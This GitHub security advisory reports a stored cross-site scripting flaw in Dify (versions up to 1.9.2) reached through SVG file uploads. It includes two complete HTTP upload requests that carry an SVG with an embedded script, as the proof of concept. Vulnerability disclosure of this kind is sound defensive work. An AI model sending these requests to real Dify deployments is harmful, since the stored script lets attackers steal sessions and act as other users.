Skip to content

Stored XSS via SVG-file upload

Moderate
laipz8200 published GHSA-cg94-8v83-7hjj Apr 20, 2026

Package

Dify

Affected versions

<= 1.9.2

Patched versions

1.13.1

Description

Summary

Using the method POST /api/files/upload, any unauthenticated user can upload an SVG file with XSS.
The method POST /v1/files/upload, which requires authentication through the application API, is also vulnerable.

Details and PoC

  1. Open any chat in your browser in incognito mode.
  2. Upload the file using the following request:
POST /api/files/upload HTTP/2
Host: dify.test
X-App-Passport: <JWT_anon>
Content-Type: multipart/form-data; boundary=----geckoformboundarya5d1bb3810213937e8658e99124e66cb
Content-Length: 597

------geckoformboundarya5d1bb3810213937e8658e99124e66cb
Content-Disposition: form-data; name="file"; filename="SVG_XSS.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(1);
   </script>
</svg>
------geckoformboundarya5d1bb3810213937e8658e99124e66cb--
  1. The response will contain a source_url, follow it (you can do this without authentication).

For the method POST /v1/files/upload, exploitation is similar:

  1. Send the following request:
POST /v1/files/upload HTTP/2
Host: dify.test
Authorization: Bearer <app_apikey>
Content-Type: multipart/form-data; boundary=----geckoformboundary14881e8331eb8afda2b7c0ddb3138c2a
Content-Length: 597

------geckoformboundary14881e8331eb8afda2b7c0ddb3138c2a
Content-Disposition: form-data; name="file"; filename="SVG_XSS.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(1);
   </script>
</svg>
------geckoformboundary14881e8331eb8afda2b7c0ddb3138c2a--
  1. The response will contain a source_url, follow it (you can do this without authentication).
image

Impact

Performing actions on behalf of a user; session theft when AT stored in Local Storage (or in cookie w/o HttpOnly), etc.

Severity

Moderate

CVE ID

CVE-2026-42138

Weaknesses

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. Learn more on MITRE.

Credits